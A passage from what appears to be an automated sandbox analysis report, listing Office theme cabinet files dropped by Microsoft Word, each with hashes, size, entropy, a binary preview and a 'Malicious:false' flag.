                              SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                              MD5:0EBC45AA0E67CC435D0745438371F948
                              SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                              SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                              SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                              Malicious:false
                              Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):261258
                              Entropy (8bit):7.99541965268665
                              Encrypted:true
                              SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                              MD5:65828DC7BE8BA1CE61AD7142252ACC54
                              SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                              SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                              SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                              Malicious:false
                              Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):276650
                              Entropy (8bit):7.360413661549906
                              Encrypted:false
                              SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwX:mlZgFtIVVTuDExeWu
                              MD5:555BDB3E059012609C94DC16689AE6B8
                              SHA1:8E075F4593DD28414B8E9D3009CB359A1DB286E2
                              SHA-256:86FC775290943173FA3DE5AC0EDA4029835F11ECC58E6F177434B0FDA9873B95
                              SHA-512:26E1207C650C93C7F02107E0E0169595B1709E53EBF28CC5B09C2FACCC5340EC248A94EFD1DFAF11CE81CBE6BD91089B00E191590B58C6AE7596774CE4D7B078
                              Malicious:false
                              Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):222992
                              Entropy (8bit):7.994458910952451
                              Encrypted:true
                              SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                              MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                              SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                              SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                              SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                              Malicious:false
                              Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):723359
                              Entropy (8bit):7.997550445816903
                              Encrypted:true
                              SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                              MD5:748A53C6BDD5CE97BD54A76C7A334286
                              SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                              SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                              SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                              Malicious:false
                              Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):550906
                              Entropy (8bit):7.998289614787931
                              Encrypted:true
                              SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                              MD5:1C12315C862A745A647DAD546EB4267E
                              SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                              SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                              SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                              Malicious:false
                              Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):230916
                              Entropy (8bit):7.994759087207758
                              Encrypted:true
                              SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                              MD5:93FA9F779520AB2D22AC4EA864B7BB34
                              SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                              SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                              SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                              Malicious:false
                              Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):28911
                              Entropy (8bit):7.7784119983764715
                              Encrypted:false
                              SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                              MD5:6D787B1E223DB6B91B69238062CCA872
                              SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                              SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                              SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                              Malicious:false
                              Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):640684
                              Entropy (8bit):7.99860205353102
                              Encrypted:true
                              SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                              MD5:F93364EEC6C4FFA5768DE545A2C34F07
                              SHA1:166398552F6B7F4509732E148F93E207DD60420B
                              SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                              SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                              Malicious:false
                              Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):698244
                              Entropy (8bit):7.997838239368002
                              Encrypted:true
                              SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                              MD5:E29CE2663A56A1444EAA3732FFB82940
                              SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                              SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                              SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                              Malicious:false
                              Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):1065873
                              Entropy (8bit):7.998277814657051
                              Encrypted:true
                              SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                              MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                              SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                              SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                              SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                              Malicious:false
                              Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):1097591
                              Entropy (8bit):7.99825462915052
                              Encrypted:true
                              SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                              MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                              SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                              SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                              SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                              Malicious:false
                              Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):953453
                              Entropy (8bit):7.99899040756787
                              Encrypted:true
                              SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                              MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                              SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                              SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                              SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                              Malicious:false
                              Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):1310275
                              Entropy (8bit):7.9985829899274385
                              Encrypted:true
                              SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                              MD5:9C9F49A47222C18025CC25575337A965
                              SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                              SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                              SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                              Malicious:false
                              Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):1766185
                              Entropy (8bit):7.9991290831091115
                              Encrypted:true
